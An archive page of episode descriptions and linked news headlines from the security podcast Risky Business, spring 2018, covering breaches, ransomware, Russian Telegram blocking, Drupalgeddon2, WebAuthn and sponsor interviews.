  • White House chaos over Rob Joyce replacement (MAGA!!! MAGAAAAAA!!!!!)
  • Much more

The show notes/links are below, and you can follow Adam, Brian or Patrick on Twitter if that’s your thing.

Show notes

Suspicious event hijacks Amazon traffic for 2 hours, steals cryptocurrency | Ars Technica
Google disables domain-fronting, removing ability to bypass state-level firewalls - Neowin
Teen charged in Nova Scotia government breach says he had 'no malicious intent' | CBC News
Atlanta Spent $2.6M to Recover From a $52,000 Ransomware Scare | WIRED
Seamus Hughes on Twitter: "A beautiful circle: Company gets ransomwared. Hires IT company to fix it. Unlocks system in record time. FBI figures out the IT company just paid the bitcoin ransom.… https://t.co/7Vrd04GeSA"
Nation-state hackers attempted to use Equifax vulnerability against DoD, NSA official says
Richard Bejtlich on Twitter: "A million times, this. The "basic cyber hygiene" thesis drives me crazy. It's the epitome of static, time-ignorant thinking. "Hygiene" may work against mindless one-shot malware, or one-trick pony script kiddies. It has no place in serious conversations about targeted intrusions.… https://t.co/EtyiHKM0sF"
DNC Lawsuit Against Russia Reveals New Details About 2016 Hack | WIRED
(tech)Darko||Dan on Twitter: "Apparently @RSAConference isn't giving out maps to Expo attendees anymore - they require you to install their app which wants access to everything short of installing a rootkit on your phone. Are you kidding me @RSAsecurity?… https://t.co/QCQeAhzbv5"
RSA conference app leaks user data
SEC fines Yahoo remnant Altaba $35 million for failing to disclose breach
These Ex-Spies Are Harvesting Facebook Photos For A Massive Facial Recognition Database
The Cat-and-Mouse Game Between Apple and the Manufacturer of an iPhone Unlocking Tool - Motherboard
Someone Is Trying to Extort iPhone Crackers GrayShift With Leaked Code - Motherboard
The NSA now officially has a new chief
Trump sends cyberwar strategy to Congress
A cybersecurity power struggle is brewing at the National Security Council
Microsoft-led industry group pledges to not assist government cyberattacks - Cyberscoop
Kaspersky Lab banned from advertising on Twitter
U.S. government weighing sanctions against Kaspersky Lab
Sentencing delayed for FSB's email-popping hacker pawn
Introducing Microsoft Azure Sphere: Secure and power the intelligent edge | Blog | Microsoft Azure
“Drupalgeddon2” touches off arms race to mass-exploit powerful Web servers | Ars Technica
‘Orangeworm’ hacking campaign hits X-ray and MRI machines
Icelandic bitcoin heist suspect arrested in Amsterdam after leaving prison | Ars Technica
A bunch of Red Pills: VMware Escapes | Keen Security Lab Blog
Spoofing Cell Networks with a USB to VGA Adapter | Hackaday
Google Translate
Avast reveals more information detailing how hackers compromised CCleaner | V3
New hacks siphon private cryptocurrency keys from airgapped wallets | Ars Technica
[TITLE] - AARP Research Report
Apr 25, 2018
Risky Business #495 -- Russian Internet users are having a bad time

We’re still running in a trimmed down format this week, sorry about that. Regular listeners would know we’ve been dealing with some unexpected stuff over here in the house of Business, but the good news is things have settled down and we’re actually back home after more than three weeks away. Things are looking good for a return to a full format show either next week or the week after.

But don’t worry, there’s plenty of good stuff in this week’s news segment with Mark Piper, including:

  • Russia blocking 15m cloud service IPs to shut down Telegram
  • RU router hax: Are they a big deal?
  • FBI’s “going dark” narrative questioned
  • Rob Joyce departs White House
  • ZTE in all sorts of trouble

This week’s show is brought to you by Cylance. Jim Walter of Cylance will be along in this week’s sponsor interview to talk about a couple of things – we’ll be looking at “fileless” malware – for what it’s worth it’s a term that we both hate – and we’ll also be talking about how complete amateurs are now able to run reasonably sophisticated malware campaigns these days thanks to the badware for hire business getting even more slick.

The show notes/links are below, and you can follow Pipes or Patrick on Twitter if that’s your thing.

Show notes

In effort to shut down Telegram, Russia blocks Amazon, Google network addresses | Ars Technica
Anatoly Rosencrantz on Twitter: "over night russian authorities are blocking about 2 000 000 IPs of Amazon and Google. Everyone thought it’s a mistake, until RKN head Zharov confirmed it is not. Tactics: to force Google and Amazon push Telegram out of their clouds by blocking basically whole cloud for Russia… https://t.co/8bZOtMENbp"
US, UK Accuse Russia of Hacking Home Routers and ISPs to Conduct MitM Attacks
Lawmakers Call FBI's 'Going Dark' Narrative 'Highly Questionable' After Motherboard Shows Cops Can Easily Hack iPhones - Motherboard
Congress wants answers on FBI's 'going dark' problem in wake of DOJ IG report
Cybersecurity adviser Rob Joyce to leave White House, return to NSA
Bolton will lead charge to replace cybersecurity coordinator, DHS secretary says
Rob Joyce on Twitter: "EU's GDPR is going to undercut a key tool for identifying malicious domains on the internet. WHOIS database will be noncompliant, or have to purge the data that makes it useful to find bad actors. @briankrebs is spot on. Cyber criminals are celebrating GDPR.… https://t.co/FfYHhERdTY"
Update: Zuckerberg Said He ‘Misspoke’ About Alerting Campaigns to Russian Hacking Attempts - Motherboard
Deleted Facebook Cybercrime Groups Had 300,000 Members — Krebs on Security
Intel to Allow Antivirus Engines to Use Integrated GPUs for Malware Scanning
Chinese Mobile Device Maker ZTE Banned From Buying U.S. Goods
Hamas-linked spyware targeting Palestinians removed from Google Play store
FTC: "Warranty Void If Removed" Stickers Are Illegal
Barclays Bank plc - ASA | CAP
NIST releases updated cybersecurity framework
Researchers Rickrolled Emergency Alert Sirens in Proof-of-Concept Hack - Motherboard
Exploitation of Drupalgeddon2 Flaw Starts After Publication of PoC Code
Yubico Delivers Passwordless Login for Enterprise Authentication on Windows 10 Devices | Yubico
The Teens Who Hacked Microsoft's Xbox Empire—And Went Too Far | WIRED
Senior Manager of Research and Development: Careers | Duo Security
Welcome to Mars
Cylance | Artificial Intelligence Based Advanced Threat Prevention
Apr 18, 2018
Risky Business #494 -- Cisco customers have a bad week, plus a deep dive on WebAuthn

Regular listeners would know Risky Business is just running the news and sponsor segments at the moment so there’s no feature interview in this week’s show. But that’s fine because we’ve got plenty to get through in the news segment with Adam Boileau.

Then we’ve got a killer sponsor interview for you this week with Nick Steele and James Barclay of Duo Security.

They’re here to talk about WebAuthn. It’s the new authentication spec currently going through the W3C process. Both Nick and James will be along later to talk about what the spec is designed to do, how it works and what its chances of becoming mainstream are, and spoiler alert, those chances are pretty good.

They’ve also provided me with some links for people out there who want to play around with Webauthn, they are below.

Links to all the news items are also below, and you can follow Patrick or Adam on Twitter if that floats your boat.

Show notes

Nation-state hackers hit Cisco switches - Cyberscoop
"Don’t Mess With Our Elections": Vigilante Hackers Strike Russia, Iran - Motherboard
With trade war looming, Chinese cyberattacks may follow - CyberScoop
Police could access US cloud data under planned crime-fighting deal
DHS defends media-monitoring database, calls critics “conspiracy theorists” | Ars Technica
Alex Ionescu on Twitter: "I generally wasn't opposed to the idea of Chrome making sure that people's documents/downloads weren't full of latent ransomware. But pegging my CPU as you run... f*cking... ESET... on my entire drive? I'm glad I switched to Edge on my desktop PC, I guess it's time for the laptop https://t.co/PHNn7gT583"
After Crackdown, Neo-Nazis Are Hosting Propaganda on Censor-Proof Networks - Motherboard
Chinese Government Forces Residents To Install Surveillance App With Awful Security - Motherboard
A Long-Awaited IoT Crisis Is Here, and Many Devices Aren't Ready | WIRED
DARPA is looking to avoid another version of Meltdown or Spectre - CyberScoop
This Tool Can Help Identify Leakers Who Copy and Paste Secret Info - Motherboard
T-Mobile Stores Part of Customers' Passwords In Plaintext, Says It Has 'Amazingly Good' Security - Motherboard
Beware of Bing Chrome Download Ads Pushing Adware/PUP Installers
Three Execs Get Prison Time for Pirating Oracle Firmware Patches
Russia Readies Telegram Ban After App Refused to Hand Over Encryption Keys to FSB
VirusTotal Launches Droidy, Its New Android Sandbox Technology
Researchers Hijack Over 2,000 Subdomains From Legitimate Sites in CloudFront Experiment
Tavis Ormandy on Twitter: "This is amazing, Windows Defender used the open source unrar code, but changed all the signed ints to unsigned for some reason, breaking the code. @halvarflake noticed and got it fixed. Remote SYSTEM memory corruption 😨 https://t.co/gsx9ZMk1Hz"
Australia's Offensive Cyber Capability | Australian Strategic Policy Institute | ASPI
Josh Marshall on Twitter: "oh look "security expert" Rudy Giuliani shows you how to do a special "dark web scan", courtesy of Experian. https://t.co/8DIlUY56Lu"
GitHub - duo-labs/webauthn: A Demonstration of the WebAuthn Specification
GitHub - duo-labs/py_webauthn: A WebAuthn Python module.
ImperialViolet - Security Keys
Web Authentication: An API for accessing Public Key Credentials Level 1
Using Hardware Token-based 2FA with the WebAuthn API – Mozilla Hacks – the Web developer blog
Trying Out Web Authentication (WebAuthn)
Web Authentication: What It Is and What It Means for Passwords | Duo Security
Apr 10, 2018
Risky Business #493 -- SWIFT, pipeline attacks, Chrome's AV feature and more

This week’s show is just the news segment and sponsor interview. But, as always, there’s plenty to discuss with our news guest Adam Boileau!

In this week’s sponsor interview we’ll be hearing from Timothy Keeler from Remediant.

Remediant is a small but growing company that does privileged account management stuff, but they’re not a password vault. Tim’s joining us this week to walk through some of the challenges of managing privileged access in devops environments and also to talk a bit about some of the challenges around single sign on and privilege management. It’s all good stuff, and it’s coming up after the news.

Links to all the news items are below, and you can follow Patrick or Adam on Twitter if that floats your boat.

Apr 04, 2018
Risky Biz Soap Box: Network detection is dead! Long live network detection!

This Soap Box edition is brought to you by ICEBRG.

ICEBRG is in the business of network-based response and detection. In simple terms they drop a box on your network that strips network metadata and shunts it up to their cloud for analysis. This allows incident responders in particular to really, really speed up their investigations. We know that a lot of internet traffic is encrypted these days, and that’s made some people take their eye off the network ball. The focus and buzz these days is very much on endpoint detection and response. Our guest on this edition of Soap Box, ICEBRG’s VP of Strategic Partnerships Jason Rebholz, thinks we’ve wound up with a blind spot as a result.

It’s true that a lot of network security tech fell behind the times, but there are some fresh approaches emerging these days that are pretty bloody useful. ICEBRG started off as a product to accelerate incident response, an example use case is deploying it in 15 minutes when you’re starting an IR job; it gives you amazing visibility for the time invested. But, they’re broadening the product a bit these days. They’re not turning it in to an IDS, but they’re able to give clients some very, very high quality signalling. I think this is what you get when you get a bunch of ex-govvies and incident responders together and they develop a product. Their alerts are more along the lines of “you’re owned by this APT group” not so much “hmm, that’s some strange ICMP traffic hitting your mail server. Maybe some router in Azerbaijan needs a reboot, ."

So the thinking is definitely fresh, and I’m increasingly seeing companies play in the network security space again. Network detection is dead! Long live network detection!

Show notes

Apr 02, 2018
Risky Business #492 -- Thomas Rid on sloppy active measures

Sorry this week’s show is late – I found myself taking an unexpected and unavoidable trip. But I’m back on deck and we’ve got a great show for you this week.

This week we hear from Thomas Rid, Professor of Strategic Studies at Johns Hopkins University’s School of Advanced International Studies. We’re having a conversation inspired by the latest spectacular Russian intelligence blunder: a Russian SIGINT operator exposing their GRU headquarters’ IP address because they forgot to fire up their VPN when logging in to their Guccifer 2.0 persona accounts. Oops.

It’s hilarious stuff, but it’s brought out the conspiracy types who are saying hey, as if they’d make this mistake. Something’s fishy! Well, as you’ll hear, these types of agencies make similar mistakes on a pretty routine basis. Thomas joins us to talk about that, and also about how mistakes like this don’t really matter in the broad scheme of things. They’re a bit of a distraction.

This week’s show is brought to you by Bugcrowd, the managed bug bounty company. Bugcrowd’s founder and CTO Casey Ellis will be dropping by to talk about a few things. They’ve raised a stack of cash since we last spoke and they plan to spend it on a bunch of stuff – they’re working on doing more efficient triage and they’re also looking at creating better legal agreements between their customers and their researchers. That’s all interesting stuff, and it’s coming up later.

The show notes/links are below, and you can follow Adam or Patrick on Twitter if that’s your thing.

Show notes

A cyberattack hobbles Atlanta, and security experts shudder
City of Atlanta still crippled six days after ransomware attack - CNN
Boeing hit by WannaCry virus, fears it could cripple some jet production | The Seattle Times
EXCLUSIVE: ‘Lone DNC Hacker’ Guccifer 2.0 Slipped Up and Revealed He Was a Russian Intelligence Officer
Guccifer 2.0 Was Always Sloppy - Motherboard
Facebook denies it collects call and SMS data from phones without permission | TechCrunch
Facebook Wants Security Researchers to Hunt Down Apps That Misuse User Data
Report: Kaspersky Lab to open new data center in Switzerland to curb espionage suspicions
Eugene Kaspersky defends publishing 'Slingshot' report
US Charges Nine Iranians With Hacking Over 300 Universities
Iranian Hackers Charged Last Week Were Actually Pretty Damn Good Phishers
US Congress Passes CLOUD Act Hidden in Budget Spending Bill
CLOUD Act, Tucked Into Omnibus, Likely To Derail Supreme Court Tech Privacy Case : NPR
Four Alleged Associates of Sinaloa Cartel-Linked Encrypted Phone Company Are On the Run - Motherboard
Secure Phone Companies Clamp Down After Sinaloa Cartel-Linked Arrest - Motherboard
UK police mobile device extraction tech raises eyebrows, study
FBI Barely Tried to Hack San Bernardino iPhone Before Going to Court With Apple - Motherboard
FBI has a unit solely devoted to its 'going dark' problem
zeynep tufekci on Twitter: "That @theintercept story about Facebook used by ICE to track immigrants that went pretty viral? It wasn't an immigrant. It was a legal subpoena on a child exploitation/abuse case. (Incredible correction at the end!!!) Motivated reasoning isn't just a right-wing phenomenon. 1/x… https://t.co/dxYOPznkrA"
Minneapolis FBI agent charged with leaking classified information to reporter | Minnesota Public Radio News
How security alerts are keeping your code safer | The GitHub Blog
Ecuador Cut Off Julian Assange’s Internet For His Political Tirades on Twitter - Motherboard
Reddit Bans Subreddits Dedicated to Dark Web Drug Markets and Selling Guns - Motherboard
NSA has been tracking bitcoin users since 2013
Angry Users Donate $120K to Cancer Research After Brian Krebs' Coinhive Article
With cryptojacking rising, exploit kits rapidly decline - CyberScoop
IETF Approves TLS 1.3 as Internet Standard
Chrome Extension Detects URL Homograph (Unicode) Attacks
Drupal Fixes Drupalgeddon2 Security Flaw That Allows Hackers to Take Over Sites
Many VPN Providers Leak Customer's IP Address via WebRTC Bug
Microsoft's Meltdown patches introduced a whole new vulnerability
Cisco IOS XE Software Static Credential Vulnerability
Digital arms merchants selling products to Australian police forces? – Digital Rights Watch
pariscid.pl: fix nasty typo in CRYPTO_memcmp. · openssl/openssl@56d5a4b · GitHub
Mar 29, 2018
Snake Oilers 5 part 2: Penten talks Honey Docs, Trend Micro on its latest

Snake Oilers is a wholly sponsored podcast where vendors pay to pitch their tech at you, the listeners. Last week we heard from Rapid7, Mimecast and VMRay, but this week we’ve got two more pitches for you. First up we’re going to hear from Penten, an Australian based company that is doing some genuinely interesting stuff with honey documents.

Also in this edition we’ll be chatting with the team at Trend Micro. And this isn’t really about pitching a product – there more here to combat messaging coming out of newer EDR companies who are portraying established vendors like them as out of touch.

As listeners would know, beating up the incumbent AV companies is one of my hobbies, so basically Trend Micro’s Eric Skinner and Eric Shulze will be along this week to tell me why I’m an idiot. They’re also going to make a strong case for independent AV testing – it’s something the industry has struggled with for a long time, but they say they want it to happen more than ever.

Mar 26, 2018
Risky Business #491 -- The biggest infosec news week we've ever seen

What a week, huh? As you’ll soon hear it’s been an absolute monster week for infosec news. Top of the list is the Cambridge Analytica scandal. For those who haven’t had time to catch up on this one, a former staffer from the data analytics firm has given some interviews in which he says the company scraped 50 million Facebook profiles and used that data to target US voters with political messages on behalf of Donald Trump’s campaign. Obviously this has made people feel quite uncomfortable, everyone is mad at Facebook and it’s news everywhere.

It also looks like Facebook CSO Alex Stamos is on his way out due to events entirely unrelated to this.

Also in this week’s show we’ve got:

  • Iranians trying to blow up Saudi Arabian chemical plants
  • Americans blaming Russia for attacks on its energy grid
  • Kaspersky blowing LIVE SOCOM ops against Al Qaeda and the remnants of Islamic State
  • The UK vowing to exact revenge on Russia via “cyber” retaliation over the Skripal affair

There is no feature interview in this week’s show, we’re going long on news, but this week’s sponsor interview is absolutely fantastic. It’s with Haroon Meer, head honcho over at Thinkst Canary.

He’s not here to talk about anything really related to products this week, instead we’re going to talk about CISO stuff. He’ll be thoughtlording the absolute sh*t out of you all this week.

Haroon thinks breached organisations are getting off too lightly in the current infosec climate because people are scared to victim shame. As you’ll hear, he thinks there’s just no excuses for how some high profile data breaches have occurred and says more CSOs should be prepared to die on the right hills to stop their companies engaging in straight up suicidal behaviour. It’s great for security to be an enabler, but that doesn’t mean signing off on whatever anyone wants to do.

The show notes/links are below, and you can follow Adam or Patrick on Twitter if that’s your thing.

Show notes

How Trump Consultants Exploited the Facebook Data of Millions - The New York Times
Ron Wyden en Twitter: "I wrote a letter to Mark Zuckerberg asking @facebook to detail the extent of misuse of its users’ private information:… https://t.co/9n121CCCtO"
Revealed: Trump’s election consultants filmed saying they use bribes and sex workers to entrap politicians – Channel 4 News
Facebook told to pull auditors from Cambridge Analytica’s offices
Cambridge Analytica CEO Alexander Nix Suspended Amid Scandals | WIRED
Facebook Exit Hints at Dissent on Handling of Russian Trolls - The New York Times
Nicole Perlroth on Twitter: "Full story publishing soon. Despite this PR-approved tweet, Stamos told hire ups he plans to leave FB in August. For the next few months, his role has been relegated to managing a small red team in SF, transitioning his group over to Guy Rosen and Pedro Canahuati, and tweeting.… https://t.co/XTbFHxRLRs"
Facebook security chief Alex Stamos leaked audiotape
A Cyberattack in Saudi Arabia Had a Deadly Goal. Experts Fear Another Try. - The New York Times
In a first, U.S. blames Russia for cyber attacks on energy grid
Russian spy attack: how likely is a British cyber offensive against Putin's regime?
Adrian Lamo, ‘Homeless Hacker’ Who Turned in Chelsea Manning, Dead at 37 — Krebs on Security
Kaspersky's 'Slingshot' report burned an ISIS-focused intelligence operation
Telegram loses appeal over encryption keys in Russia
Communications network of choice for Australian criminals shut down
Child abuse imagery found within bitcoin's blockchain | Technology | The Guardian
FBI raids home of suspected spy agency leaker - CNN
Svitzer employee details stolen in data breach affecting almost half of its Australian employees - ABC News (Australian Broadcasting Corporation)
Safari, Microsoft Edge exploits earn hackers $162k at Pwn2Own
China Bans People With Low "Social Credit" From Planes and Trains
Mar 21, 2018